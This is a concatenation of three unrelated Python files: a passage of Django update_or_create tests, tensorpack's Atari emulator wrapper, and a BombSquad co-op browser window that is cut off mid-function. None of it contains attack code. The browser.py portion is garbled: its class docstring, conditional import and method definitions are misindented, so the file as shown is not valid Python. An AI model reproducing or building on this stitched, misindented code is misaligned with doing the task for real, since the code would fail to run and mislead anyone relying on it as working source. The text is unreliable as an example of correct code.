            ManualPrimaryKeyTest.objects.update_or_create(id=1, data="Different")
        self.assertEqual(ManualPrimaryKeyTest.objects.get(id=1).data, "Original")
    def test_with_pk_property(self):
        """
        Using the pk property of a model is allowed.
        """
        Thing.objects.update_or_create(pk=1)
    def test_error_contains_full_traceback(self):
        """
        update_or_create should raise IntegrityErrors with the full traceback.
        This is tested by checking that a known method call is in the traceback.
        We cannot use assertRaises/assertRaises here because we need to inspect
        the actual traceback. Refs #16340.
        """
        try:
            ManualPrimaryKeyTest.objects.update_or_create(id=1, data="Different")
        except IntegrityError:
            formatted_traceback = traceback.format_exc()
            self.assertIn('obj.save', formatted_traceback)
    def test_create_with_related_manager(self):
        """
        Should be able to use update_or_create from the related manager to
        create a book. Refs #23611.
        """
        p = Publisher.objects.create(name="Acme Publishing")
        book, created = p.books.update_or_create(name="The Book of Ed & Fred")
        self.assertTrue(created)
        self.assertEqual(p.books.count(), 1)
    def test_update_with_related_manager(self):
        """
        Should be able to use update_or_create from the related manager to
        update a book. Refs #23611.
        """
        p = Publisher.objects.create(name="Acme Publishing")
        book = Book.objects.create(name="The Book of Ed & Fred", publisher=p)
        self.assertEqual(p.books.count(), 1)
        name = "The Book of Django"
        book, created = p.books.update_or_create(defaults={'name': name}, id=book.id)
        self.assertFalse(created)
        self.assertEqual(book.name, name)
        # The update must not have created a second book.
        self.assertEqual(p.books.count(), 1)
    def test_create_with_many(self):
        """
        Should be able to use update_or_create from the m2m related manager to
        create a book. Refs #23611.
        """
        p = Publisher.objects.create(name="Acme Publishing")
        author = Author.objects.create(name="Ted")
        book, created = author.books.update_or_create(name="The Book of Ed & Fred", publisher=p)
        self.assertTrue(created)
        self.assertEqual(author.books.count(), 1)
    def test_update_with_many(self):
        """
        Should be able to use update_or_create from the m2m related manager to
        update a book. Refs #23611.
        """
        p = Publisher.objects.create(name="Acme Publishing")
        author = Author.objects.create(name="Ted")
        book = Book.objects.create(name="The Book of Ed & Fred", publisher=p)
        book.authors.add(author)
        self.assertEqual(author.books.count(), 1)
        name = "The Book of Django"
        book, created = author.books.update_or_create(defaults={'name': name}, id=book.id)
        self.assertFalse(created)
        self.assertEqual(book.name, name)
        self.assertEqual(author.books.count(), 1)
    def test_defaults_exact(self):
        """
        If you have a field named defaults and want to use it as an exact
        lookup, you need to use 'defaults__exact'.
        """
        obj, created = Person.objects.update_or_create(
            first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
                'birthday': date(1943, 2, 25),
                'defaults': 'testing',
            }
        )
        self.assertTrue(created)
        self.assertEqual(obj.defaults, 'testing')
        # Second call matches via defaults__exact and updates the field.
        obj, created = Person.objects.update_or_create(
            first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
                'birthday': date(1943, 2, 25),
                'defaults': 'another testing',
            }
        )
        self.assertFalse(created)
        self.assertEqual(obj.defaults, 'another testing')
    def test_create_callable_default(self):
        # A callable default is evaluated when the object is created.
        obj, created = Person.objects.update_or_create(
            first_name='George', last_name='Harrison',
            defaults={'birthday': lambda: date(1943, 2, 25)},
        )
        self.assertIs(created, True)
        self.assertEqual(obj.birthday, date(1943, 2, 25))
    def test_update_callable_default(self):
        # A callable default is also evaluated on the update path.
        Person.objects.update_or_create(
            first_name='George', last_name='Harrison', birthday=date(1942, 2, 25),
        )
        obj, created = Person.objects.update_or_create(
            first_name='George',
            defaults={'last_name': lambda: 'NotHarrison'},
        )
        self.assertIs(created, False)
        self.assertEqual(obj.last_name, 'NotHarrison')
class UpdateOrCreateTransactionTests(TransactionTestCase):
    """update_or_create() row-locking behavior across real transactions."""
    available_apps = ['get_or_create']
    @skipUnlessDBFeature('has_select_for_update')
    @skipUnlessDBFeature('supports_transactions')
    def test_updates_in_transaction(self):
        """
        Objects are selected and updated in a transaction to avoid race
        conditions. This test forces update_or_create() to hold the lock
        in another thread for a relatively long time so that it can update
        while it holds the lock. The updated field isn't a field in 'defaults',
        so update_or_create() shouldn't have an effect on it.
        """
        lock_status = {'has_grabbed_lock': False}
        def birthday_sleep():
            # Evaluated while update_or_create() holds the row lock; the
            # sleep keeps the lock held so the main thread's update blocks.
            lock_status['has_grabbed_lock'] = True
            time.sleep(0.5)
            return date(1940, 10, 10)
        def update_birthday_slowly():
            Person.objects.update_or_create(
                first_name='John', defaults={'birthday': birthday_sleep}
            )
            # Avoid leaking connection for Oracle
            connection.close()
        def lock_wait():
            # timeout after ~0.5 seconds
            for i in range(20):
                time.sleep(0.025)
                if lock_status['has_grabbed_lock']:
                    return True
            return False
        Person.objects.create(first_name='John', last_name='Lennon', birthday=date(1940, 10, 9))
        # update_or_create in a separate thread
        t = Thread(target=update_birthday_slowly)
        before_start = datetime.now()
        t.start()
        if not lock_wait():
            self.skipTest('Database took too long to lock the row')
        # Update during lock
        Person.objects.filter(first_name='John').update(last_name='NotLennon')
        after_update = datetime.now()
        # Wait for thread to finish
        t.join()
        # The update remains and it blocked.
        updated_person = Person.objects.get(first_name='John')
        self.assertGreater(after_update - before_start, timedelta(seconds=0.5))
        self.assertEqual(updated_person.last_name, 'NotLennon')
class InvalidCreateArgumentsTests(SimpleTestCase):
    """Invalid field names in kwargs or defaults must raise FieldError."""
    # Expected message for the single-bad-field cases below.
    msg = "Invalid field name(s) for model Thing: 'nonexistent'."
    def test_get_or_create_with_invalid_defaults(self):
        with self.assertRaisesMessage(FieldError, self.msg):
            Thing.objects.get_or_create(name='a', defaults={'nonexistent': 'b'})
    def test_get_or_create_with_invalid_kwargs(self):
        with self.assertRaisesMessage(FieldError, self.msg):
            Thing.objects.get_or_create(name='a', nonexistent='b')
    def test_update_or_create_with_invalid_defaults(self):
        with self.assertRaisesMessage(FieldError, self.msg):
            Thing.objects.update_or_create(name='a', defaults={'nonexistent': 'b'})
    def test_update_or_create_with_invalid_kwargs(self):
        with self.assertRaisesMessage(FieldError, self.msg):
            Thing.objects.update_or_create(name='a', nonexistent='b')
    def test_multiple_invalid_fields(self):
        # Bad names from kwargs and defaults are combined in one message.
        with self.assertRaisesMessage(FieldError, "Invalid field name(s) for model Thing: 'invalid', 'nonexistent'"):
            Thing.objects.update_or_create(name='a', nonexistent='b', defaults={'invalid': 'c'})
|
atari.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: atari.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import numpy as np
import time, os
import cv2
from collections import deque
import threading
import six
from six.moves import range
from tensorpack.utils import (get_rng, logger, get_dataset_path, execute_only_once)
from tensorpack.utils.stats import StatCounter
from tensorpack.RL.envbase import RLEnvironment, DiscreteActionSpace
from ale_python_interface import ALEInterface
__all__ = ['AtariPlayer']
ROM_URL = "https://github.com/openai/atari-py/tree/master/atari_py/atari_roms"
_ALE_LOCK = threading.Lock()
class AtariPlayer(RLEnvironment):
    """
    A wrapper for atari emulator.
    Will automatically restart when a real episode ends (isOver might be just
    lost of lives but not game over).
    """
    def __init__(self, rom_file, viz=0, height_range=(None, None),
                 frame_skip=4, image_shape=(84, 84), nullop_start=30,
                 live_lost_as_eoe=True):
        """
        :param rom_file: path to the rom
        :param frame_skip: skip every k frames and repeat the action
        :param image_shape: (w, h)
        :param height_range: (h1, h2) to cut
        :param viz: visualization to be done.
            Set to 0 to disable.
            Set to a positive number to be the delay between frames to show.
            Set to a string to be a directory to store frames.
        :param nullop_start: start with random number of null ops
        :param live_losts_as_eoe: consider lost of lives as end of episode. useful for training.
        """
        super(AtariPlayer, self).__init__()
        # Allow bare rom names to be resolved from the dataset directory.
        if not os.path.isfile(rom_file) and '/' not in rom_file:
            rom_file = get_dataset_path('atari_rom', rom_file)
        assert os.path.isfile(rom_file), \
            "rom {} not found. Please download at {}".format(rom_file, ROM_URL)
        try:
            ALEInterface.setLoggerMode(ALEInterface.Logger.Warning)
        except AttributeError:
            # Older ALE versions lack setLoggerMode; warn only once.
            if execute_only_once():
                logger.warn("You're not using latest ALE")
        # avoid simulator bugs: https://github.com/mgbellemare/Arcade-Learning-Environment/issues/86
        with _ALE_LOCK:
            self.ale = ALEInterface()
        self.rng = get_rng(self)
        self.ale.setInt(b"random_seed", self.rng.randint(0, 30000))
        self.ale.setBool(b"showinfo", False)
        # Frame skipping is done by this wrapper (see action()), not by ALE.
        self.ale.setInt(b"frame_skip", 1)
        self.ale.setBool(b'color_averaging', False)
        # manual.pdf suggests otherwise.
        self.ale.setFloat(b'repeat_action_probability', 0.0)
        # viz setup
        if isinstance(viz, six.string_types):
            # A string means "record frames to this directory" (no display).
            assert os.path.isdir(viz), viz
            self.ale.setString(b'record_screen_dir', viz)
            viz = 0
        if isinstance(viz, int):
            viz = float(viz)
        self.viz = viz
        if self.viz and isinstance(self.viz, float):
            self.windowname = os.path.basename(rom_file)
            cv2.startWindowThread()
            cv2.namedWindow(self.windowname)
        self.ale.loadROM(rom_file.encode('utf-8'))
        self.width, self.height = self.ale.getScreenDims()
        self.actions = self.ale.getMinimalActionSet()
        self.live_lost_as_eoe = live_lost_as_eoe
        self.frame_skip = frame_skip
        self.nullop_start = nullop_start
        self.height_range = height_range
        self.image_shape = image_shape
        self.current_episode_score = StatCounter()
        self.restart_episode()
    def _grab_raw_image(self):
        """
        :returns: the current 3-channel image
        """
        m = self.ale.getScreenRGB()
        return m.reshape((self.height, self.width, 3))
    def current_state(self):
        """
        :returns: a gray-scale (h, w, 1) uint8 image
        """
        ret = self._grab_raw_image()
        # max-pooled over the last screen
        ret = np.maximum(ret, self.last_raw_screen)
        if self.viz:
            if isinstance(self.viz, float):
                cv2.imshow(self.windowname, ret)
                time.sleep(self.viz)
        # Crop vertically, then convert to grayscale and resize.
        ret = ret[self.height_range[0]:self.height_range[1], :].astype('float32')
        # 0.299,0.587.0.114. same as rgb2y in torch/image
        ret = cv2.cvtColor(ret, cv2.COLOR_RGB2GRAY)
        ret = cv2.resize(ret, self.image_shape)
        ret = np.expand_dims(ret, axis=2)
        return ret.astype('uint8')  # to save some memory
    def get_action_space(self):
        """:returns: a DiscreteActionSpace over the rom's minimal action set."""
        return DiscreteActionSpace(len(self.actions))
    def finish_episode(self):
        # Record the episode score into the environment stats.
        self.stats['score'].append(self.current_episode_score.sum)
    def restart_episode(self):
        """Reset the emulator and perform a random number of null-ops."""
        self.current_episode_score.reset()
        with _ALE_LOCK:
            self.ale.reset_game()
        # random null-ops start
        n = self.rng.randint(self.nullop_start)
        self.last_raw_screen = self._grab_raw_image()
        for k in range(n):
            if k == n - 1:
                # Keep the screen just before the final null-op so
                # current_state() can max-pool over it.
                self.last_raw_screen = self._grab_raw_image()
            self.ale.act(0)
    def action(self, act):
        """
        :param act: an index of the action
        :returns: (reward, isOver)
        """
        oldlives = self.ale.lives()
        r = 0
        # Repeat the action for frame_skip frames, accumulating reward.
        for k in range(self.frame_skip):
            if k == self.frame_skip - 1:
                self.last_raw_screen = self._grab_raw_image()
            r += self.ale.act(self.actions[act])
            newlives = self.ale.lives()
            if self.ale.game_over() or \
                    (self.live_lost_as_eoe and newlives < oldlives):
                break
        self.current_episode_score.feed(r)
        isOver = self.ale.game_over()
        if self.live_lost_as_eoe:
            isOver = isOver or newlives < oldlives
        if isOver:
            self.finish_episode()
        # Only restart on a true game-over; a lost life just ends the
        # (training) episode without resetting the emulator.
        if self.ale.game_over():
            self.restart_episode()
        return (r, isOver)
if __name__ == '__main__':
    # 'time' and 'threading' are already imported at module scope; the
    # duplicate in-block imports (and the unused 'multiprocessing') were
    # removed.
    import sys

    def benchmark():
        """Run 5000 random-action emulator steps and print elapsed seconds."""
        a = AtariPlayer(sys.argv[1], viz=False, height_range=(28, -8))
        num = a.get_action_space().num_actions()
        rng = get_rng(num)
        start = time.time()
        cnt = 0
        while True:
            act = rng.choice(range(num))
            r, o = a.action(act)
            a.current_state()
            cnt += 1
            if cnt == 5000:
                break
        print(time.time() - start)

    if len(sys.argv) == 3 and sys.argv[2] == 'benchmark':
        # Stress-test: three background emulators plus one in the main thread.
        for k in range(3):
            # th = multiprocessing.Process(target=benchmark)
            th = threading.Thread(target=benchmark)
            th.start()
            time.sleep(0.02)
        benchmark()
    else:
        # Interactive mode: display the game (~30ms/frame) with random actions.
        a = AtariPlayer(sys.argv[1],
                        viz=0.03, height_range=(28, -8))
        num = a.get_action_space().num_actions()
        rng = get_rng(num)
        while True:
            # im = a.grab_image()
            # cv2.imshow(a.romname, im)
            act = rng.choice(range(num))
            print(act)
            r, o = a.action(act)
            a.current_state()
            # time.sleep(0.1)
            print(r, o)
|
browser.py | # Released under the MIT License. See LICENSE for details.
#
"""UI for browsing available co-op levels/games/etc."""
# FIXME: Break this up.
# pylint: disable=too-many-lines
from __future__ import annotations
import copy
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui.store.button import StoreButton
from bastd.ui.league.rankbutton import LeagueRankButton
from bastd.ui.store.browser import StoreBrowserWindow
if TYPE_CHECKING:
from typing import Any, Optional, Tuple, Dict, List, Union
class CoopBrowserWindow(ba.Window):
"""Window for browsing co-op levels/games/etc."""
def _update_corner_button_positions(self) -> None:
    """Shift our corner buttons left when the party icon needs the space."""
    uiscale = ba.app.ui.uiscale
    small = uiscale is ba.UIScale.SMALL
    x_shift = -55 if small and _ba.is_party_icon_visible() else 0
    # Both buttons share the same vertical position.
    pos_v = self._height - 85 - (4 if small else 0)
    if self._league_rank_button is not None:
        self._league_rank_button.set_position(
            (self._width - 282 + x_shift - self._x_inset, pos_v))
    if self._store_button is not None:
        self._store_button.set_position(
            (self._width - 170 + x_shift - self._x_inset, pos_v))
def __init__(self,
             transition: Optional[str] = 'in_right',
             origin_widget: ba.Widget = None):
    """Build the co-op browser window and kick off periodic updates."""
    # pylint: disable=too-many-statements
    # pylint: disable=cyclic-import
    import threading
    # Preload some modules we use in a background thread so we won't
    # have a visual hitch when the user taps them.
    threading.Thread(target=self._preload_modules).start()
    ba.set_analytics_screen('Coop Window')
    app = ba.app
    cfg = app.config
    # Quick note to players that tourneys won't work in ballistica
    # core builds. (need to split the word so it won't get subbed out)
    if 'ballistica' + 'core' == _ba.appname():
        ba.timer(1.0,
                 lambda: ba.screenmessage(
                     ba.Lstr(resource='noTournamentsInTestBuildText'),
                     color=(1, 1, 0),
                 ),
                 timetype=ba.TimeType.REAL)
    # If they provided an origin-widget, scale up from that.
    scale_origin: Optional[Tuple[float, float]]
    if origin_widget is not None:
        self._transition_out = 'out_scale'
        scale_origin = origin_widget.get_screen_space_center()
        transition = 'in_scale'
    else:
        self._transition_out = 'out_right'
        scale_origin = None
    # Try to recreate the same number of buttons we had last time so our
    # re-selection code works.
    self._tournament_button_count = app.config.get('Tournament Rows', 0)
    assert isinstance(self._tournament_button_count, int)
    self._easy_button: Optional[ba.Widget] = None
    self._hard_button: Optional[ba.Widget] = None
    self._hard_button_lock_image: Optional[ba.Widget] = None
    self._campaign_percent_text: Optional[ba.Widget] = None
    # Window geometry varies by ui scale.
    uiscale = ba.app.ui.uiscale
    self._width = 1320 if uiscale is ba.UIScale.SMALL else 1120
    self._x_inset = x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
    self._height = (657 if uiscale is ba.UIScale.SMALL else
                    730 if uiscale is ba.UIScale.MEDIUM else 800)
    app.ui.set_main_menu_location('Coop Select')
    self._r = 'coopSelectWindow'
    top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
    self._tourney_data_up_to_date = False
    self._campaign_difficulty = _ba.get_account_misc_val(
        'campaignDifficulty', 'easy')
    super().__init__(root_widget=ba.containerwidget(
        size=(self._width, self._height + top_extra),
        toolbar_visibility='menu_full',
        scale_origin_stack_offset=scale_origin,
        stack_offset=((0, -15) if uiscale is ba.UIScale.SMALL else (
            0, 0) if uiscale is ba.UIScale.MEDIUM else (0, 0)),
        transition=transition,
        scale=(1.2 if uiscale is ba.UIScale.SMALL else
               0.8 if uiscale is ba.UIScale.MEDIUM else 0.75)))
    # With toolbars on small ui, the global back button is used instead.
    if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
        self._back_button = None
    else:
        self._back_button = ba.buttonwidget(
            parent=self._root_widget,
            position=(75 + x_inset, self._height - 87 -
                      (4 if uiscale is ba.UIScale.SMALL else 0)),
            size=(120, 60),
            scale=1.2,
            autoselect=True,
            label=ba.Lstr(resource='backText'),
            button_type='back')
    self._league_rank_button: Optional[LeagueRankButton]
    self._store_button: Optional[StoreButton]
    self._store_button_widget: Optional[ba.Widget]
    self._league_rank_button_widget: Optional[ba.Widget]
    if not app.ui.use_toolbars:
        # No toolbars: we provide our own league-rank and store buttons.
        prb = self._league_rank_button = LeagueRankButton(
            parent=self._root_widget,
            position=(self._width - (282 + x_inset), self._height - 85 -
                      (4 if uiscale is ba.UIScale.SMALL else 0)),
            size=(100, 60),
            color=(0.4, 0.4, 0.9),
            textcolor=(0.9, 0.9, 2.0),
            scale=1.05,
            on_activate_call=ba.WeakCall(self._switch_to_league_rankings))
        self._league_rank_button_widget = prb.get_button()
        sbtn = self._store_button = StoreButton(
            parent=self._root_widget,
            position=(self._width - (170 + x_inset), self._height - 85 -
                      (4 if uiscale is ba.UIScale.SMALL else 0)),
            size=(100, 60),
            color=(0.6, 0.4, 0.7),
            show_tickets=True,
            button_type='square',
            sale_scale=0.85,
            textcolor=(0.9, 0.7, 1.0),
            scale=1.05,
            on_activate_call=ba.WeakCall(self._switch_to_score, None))
        self._store_button_widget = sbtn.get_button()
        ba.widget(edit=self._back_button,
                  right_widget=self._league_rank_button_widget)
        ba.widget(edit=self._league_rank_button_widget,
                  left_widget=self._back_button)
    else:
        self._league_rank_button = None
        self._store_button = None
        self._store_button_widget = None
        self._league_rank_button_widget = None
    # Move our corner buttons dynamically to keep them out of the way of
    # the party icon :-(
    self._update_corner_button_positions()
    self._update_corner_button_positions_timer = ba.Timer(
        1.0,
        ba.WeakCall(self._update_corner_button_positions),
        repeat=True,
        timetype=ba.TimeType.REAL)
    self._last_tournament_query_time: Optional[float] = None
    self._last_tournament_query_response_time: Optional[float] = None
    self._doing_tournament_query = False
    # Restore the previously-selected rows/levels from config.
    self._selected_campaign_level = (cfg.get(
        'Selected Coop Campaign Level', None))
    self._selected_custom_level = (cfg.get('Selected Coop Custom Level',
                                           None))
    self._selected_challenge_level = (cfg.get(
        'Selected Coop Challenge Level', None))
    # Don't want initial construction affecting our last-selected.
    self._do_selection_callbacks = False
    v = self._height - 95
    txt = ba.textwidget(
        parent=self._root_widget,
        position=(self._width * 0.5,
                  v + 40 - (0 if uiscale is ba.UIScale.SMALL else 0)),
        size=(0, 0),
        text=ba.Lstr(resource='playModes.singlePlayerCoopText',
                     fallback_resource='playModes.coopText'),
        h_align='center',
        color=app.ui.title_color,
        scale=1.5,
        maxwidth=500,
        v_align='center')
    if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
        ba.textwidget(edit=txt, text='')
    if self._back_button is not None:
        ba.buttonwidget(
            edit=self._back_button,
            button_type='backSmall',
            size=(60, 50),
            position=(75 + x_inset, self._height - 87 -
                      (4 if uiscale is ba.UIScale.SMALL else 0) + 6),
            label=ba.charstr(ba.SpecialChar.BACK))
    self._selected_row = cfg.get('Selected Coop Row', None)
    # Shared media used by the level buttons.
    self.star_tex = ba.gettexture('star')
    self.lsbt = ba.getmodel('level_select_button_transparent')
    self.lsbo = ba.getmodel('level_select_button_opaque')
    self.a_outline_tex = ba.gettexture('achievementOutline')
    self.a_outline_model = ba.getmodel('achievementOutline')
    self._scroll_width = self._width - (130 + 2 * x_inset)
    self._scroll_height = (self._height -
                           (190 if uiscale is ba.UIScale.SMALL
                            and app.ui.use_toolbars else 160))
    self._subcontainerwidth = 800.0
    self._subcontainerheight = 1400.0
    self._scrollwidget = ba.scrollwidget(
        parent=self._root_widget,
        highlight=False,
        position=(65 + x_inset, 120) if uiscale is ba.UIScale.SMALL
        and app.ui.use_toolbars else (65 + x_inset, 70),
        size=(self._scroll_width, self._scroll_height),
        simple_culling_v=10.0,
        claims_left_right=True,
        claims_tab=True,
        selection_loops_to_parent=True)
    self._subcontainer: Optional[ba.Widget] = None
    # Take note of our account state; we'll refresh later if this changes.
    self._account_state_num = _ba.get_account_state_num()
    # Same for fg/bg state.
    self._fg_state = app.fg_state
    self._refresh()
    self._restore_state()
    # Even though we might display cached tournament data immediately, we
    # don't consider it valid until we've pinged.
    # the server for an update
    self._tourney_data_up_to_date = False
    # If we've got a cached tournament list for our account and info for
    # each one of those tournaments, go ahead and display it as a
    # starting point.
    if (app.accounts.account_tournament_list is not None
            and app.accounts.account_tournament_list[0]
            == _ba.get_account_state_num()
            and all(t_id in app.accounts.tournament_info
                    for t_id in app.accounts.account_tournament_list[1])):
        tourney_data = [
            app.accounts.tournament_info[t_id]
            for t_id in app.accounts.account_tournament_list[1]
        ]
        self._update_for_data(tourney_data)
    # This will pull new data periodically, update timers, etc.
    self._update_timer = ba.Timer(1.0,
                                  ba.WeakCall(self._update),
                                  timetype=ba.TimeType.REAL,
                                  repeat=True)
    self._update()
@staticmethod
def _preload_modules() -> None:
    """Preload modules we use (called in bg thread)."""
    # Importing these ahead of time (off the main thread) avoids a visible
    # hitch the first time the user navigates to a UI that needs them.
    import bastd.ui.purchase as _unused1
    import bastd.ui.coop.gamebutton as _unused2
    import bastd.ui.confirm as _unused3
    import bastd.ui.account as _unused4
    import bastd.ui.league.rankwindow as _unused5
    import bastd.ui.store.browser as _unused6
    import bastd.ui.account.viewer as _unused7
    import bastd.ui.tournamentscores as _unused8
    import bastd.ui.tournamententry as _unused9
    import bastd.ui.play as _unused10
def _update(self) -> None:
    """Periodic (1s) refresh: tournament queries, countdowns, lock icon."""
    # Do nothing if we've somehow outlived our actual UI.
    if not self._root_widget:
        return
    cur_time = ba.time(ba.TimeType.REAL)
    # If its been a while since we got a tournament update, consider the
    # data invalid (prevents us from joining tournaments if our internet
    # connection goes down for a while).
    if (self._last_tournament_query_response_time is None
            or ba.time(ba.TimeType.REAL) -
            self._last_tournament_query_response_time > 60.0 * 2):
        self._tourney_data_up_to_date = False
    # If our account state has changed, do a full request.
    account_state_num = _ba.get_account_state_num()
    if account_state_num != self._account_state_num:
        self._account_state_num = account_state_num
        self._save_state()
        self._refresh()
        # Also encourage a new tournament query since this will clear out
        # our current results.
        if not self._doing_tournament_query:
            self._last_tournament_query_time = None
    # If we've been backgrounded/foregrounded, invalidate our
    # tournament entries (they will be refreshed below asap).
    if self._fg_state != ba.app.fg_state:
        self._tourney_data_up_to_date = False
    # Send off a new tournament query if its been long enough or whatnot.
    if not self._doing_tournament_query and (
            self._last_tournament_query_time is None
            or cur_time - self._last_tournament_query_time > 30.0
            or self._fg_state != ba.app.fg_state):
        self._fg_state = ba.app.fg_state
        self._last_tournament_query_time = cur_time
        self._doing_tournament_query = True
        _ba.tournament_query(
            args={
                'source': 'coop window refresh',
                'numScores': 1
            },
            callback=ba.WeakCall(self._on_tournament_query_response),
        )
    # Decrement time on our tournament buttons.
    ads_enabled = _ba.have_incentivized_ad()
    for tbtn in self._tournament_buttons:
        tbtn['time_remaining'] = max(0, tbtn['time_remaining'] - 1)
        if tbtn['time_remaining_value_text'] is not None:
            # Show '-' while our data is stale or there's no deadline.
            ba.textwidget(
                edit=tbtn['time_remaining_value_text'],
                text=ba.timestring(tbtn['time_remaining'],
                                   centi=False,
                                   suppress_format_warning=True) if
                (tbtn['has_time_remaining']
                 and self._tourney_data_up_to_date) else '-')
        # Also adjust the ad icon visibility.
        if tbtn.get('allow_ads', False) and _ba.has_video_ads():
            ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
                           opacity=1.0 if ads_enabled else 0.25)
            ba.textwidget(edit=tbtn['entry_fee_text_remaining'],
                          color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
    self._update_hard_mode_lock_image()
def _update_hard_mode_lock_image(self) -> None:
    """Show or hide the lock overlay on the hard-mode campaign button."""
    try:
        unlocked = ba.app.accounts.have_pro_options()
        ba.imagewidget(edit=self._hard_button_lock_image,
                       opacity=0.0 if unlocked else 1.0)
    except Exception:
        # Widget may not exist yet (or was deleted); just log.
        ba.print_exception('Error updating campaign lock.')
def _update_for_data(self, data: Optional[List[Dict[str, Any]]]) -> None:
    """Rebuild/refresh tournament buttons from server tournament data."""
    # pylint: disable=too-many-statements
    # pylint: disable=too-many-locals
    # pylint: disable=too-many-branches
    from ba.internal import getcampaign, get_tournament_prize_strings
    # If the number of tournaments or challenges in the data differs from
    # our current arrangement, refresh with the new number.
    if ((data is None and self._tournament_button_count != 0)
            or (data is not None and
                (len(data) != self._tournament_button_count))):
        self._tournament_button_count = len(
            data) if data is not None else 0
        ba.app.config['Tournament Rows'] = self._tournament_button_count
        self._refresh()
    # Update all of our tourney buttons based on whats in data.
    for i, tbtn in enumerate(self._tournament_buttons):
        assert data is not None
        entry: Dict[str, Any] = data[i]
        prize_y_offs = (34 if 'prizeRange3' in entry else
                        20 if 'prizeRange2' in entry else 12)
        x_offs = 90
        # This seems to be a false alarm.
        # pylint: disable=unbalanced-tuple-unpacking
        pr1, pv1, pr2, pv2, pr3, pv3 = (
            get_tournament_prize_strings(entry))
        # pylint: enable=unbalanced-tuple-unpacking
        # Tournaments gated behind a league requirement show up locked.
        enabled = 'requiredLeague' not in entry
        ba.buttonwidget(edit=tbtn['button'],
                        color=(0.5, 0.7, 0.2) if enabled else
                        (0.5, 0.5, 0.5))
        ba.imagewidget(edit=tbtn['lock_image'],
                       opacity=0.0 if enabled else 1.0)
        ba.textwidget(edit=tbtn['prize_range_1_text'],
                      text='-' if pr1 == '' else pr1,
                      position=(tbtn['button_x'] + 365 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 + prize_y_offs))
        # We want to draw values containing tickets a bit smaller
        # (scratch that; we now draw medals a bit bigger).
        ticket_char = ba.charstr(ba.SpecialChar.TICKET_BACKING)
        prize_value_scale_large = 1.0
        prize_value_scale_small = 1.0
        ba.textwidget(edit=tbtn['prize_value_1_text'],
                      text='-' if pv1 == '' else pv1,
                      scale=prize_value_scale_large if ticket_char
                      not in pv1 else prize_value_scale_small,
                      position=(tbtn['button_x'] + 380 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 + prize_y_offs))
        ba.textwidget(edit=tbtn['prize_range_2_text'],
                      text=pr2,
                      position=(tbtn['button_x'] + 365 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 - 45 + prize_y_offs))
        ba.textwidget(edit=tbtn['prize_value_2_text'],
                      text=pv2,
                      scale=prize_value_scale_large if ticket_char
                      not in pv2 else prize_value_scale_small,
                      position=(tbtn['button_x'] + 380 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 - 45 + prize_y_offs))
        ba.textwidget(edit=tbtn['prize_range_3_text'],
                      text=pr3,
                      position=(tbtn['button_x'] + 365 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 - 90 + prize_y_offs))
        ba.textwidget(edit=tbtn['prize_value_3_text'],
                      text=pv3,
                      scale=prize_value_scale_large if ticket_char
                      not in pv3 else prize_value_scale_small,
                      position=(tbtn['button_x'] + 380 + x_offs,
                                tbtn['button_y'] + tbtn['button_scale_y'] -
                                93 - 90 + prize_y_offs))
        leader_name = '-'
        leader_score: Union[str, ba.Lstr] = '-'
        if entry['scores']:
            # Deep-copy the top score so later updates can't mutate
            # what we're holding.
            score = tbtn['leader'] = copy.deepcopy(entry['scores'][0])
            leader_name = score[1]
            leader_score = (ba.timestring(
                score[0] * 10,
                centi=True,
                timeformat=ba.TimeFormat.MILLISECONDS,
                suppress_format_warning=True) if entry['scoreType']
                            == 'time' else str(score[0]))
        else:
            tbtn['leader'] = None
        ba.textwidget(edit=tbtn['current_leader_name_text'],
                      text=ba.Lstr(value=leader_name))
        self._tournament_leader_score_type = (entry['scoreType'])
        ba.textwidget(edit=tbtn['current_leader_score_text'],
                      text=leader_score)
        ba.buttonwidget(edit=tbtn['more_scores_button'],
                        label=ba.Lstr(resource=self._r + '.seeMoreText'))
        out_of_time_text: Union[str, ba.Lstr] = (
            '-' if 'totalTime' not in entry else ba.Lstr(
                resource=self._r + '.ofTotalTimeText',
                subs=[('${TOTAL}',
                       ba.timestring(entry['totalTime'],
                                     centi=False,
                                     suppress_format_warning=True))]))
        ba.textwidget(edit=tbtn['time_remaining_out_of_text'],
                      text=out_of_time_text)
        tbtn['time_remaining'] = entry['timeRemaining']
        tbtn['has_time_remaining'] = entry is not None
        tbtn['tournament_id'] = entry['tournamentID']
        tbtn['required_league'] = (None if 'requiredLeague' not in entry
                                   else entry['requiredLeague'])
        game = ba.app.accounts.tournament_info[
            tbtn['tournament_id']]['game']
        if game is None:
            # No game info yet; show a placeholder.
            ba.textwidget(edit=tbtn['button_text'], text='-')
            ba.imagewidget(edit=tbtn['image'],
                           texture=ba.gettexture('black'),
                           opacity=0.2)
        else:
            # 'game' is 'CampaignName:LevelName'.
            campaignname, levelname = game.split(':')
            campaign = getcampaign(campaignname)
            max_players = ba.app.accounts.tournament_info[
                tbtn['tournament_id']]['maxPlayers']
            txt = ba.Lstr(
                value='${A} ${B}',
                subs=[('${A}', campaign.getlevel(levelname).displayname),
                      ('${B}',
                       ba.Lstr(resource='playerCountAbbreviatedText',
                               subs=[('${COUNT}', str(max_players))]))])
            ba.textwidget(edit=tbtn['button_text'], text=txt)
            ba.imagewidget(
                edit=tbtn['image'],
                texture=campaign.getlevel(levelname).get_preview_texture(),
                opacity=1.0 if enabled else 0.5)
        # Map the server fee tier to the resource name of its price value.
        fee = entry['fee']
        if fee is None:
            fee_var = None
        elif fee == 4:
            fee_var = 'price.tournament_entry_4'
        elif fee == 3:
            fee_var = 'price.tournament_entry_3'
        elif fee == 2:
            fee_var = 'price.tournament_entry_2'
        elif fee == 1:
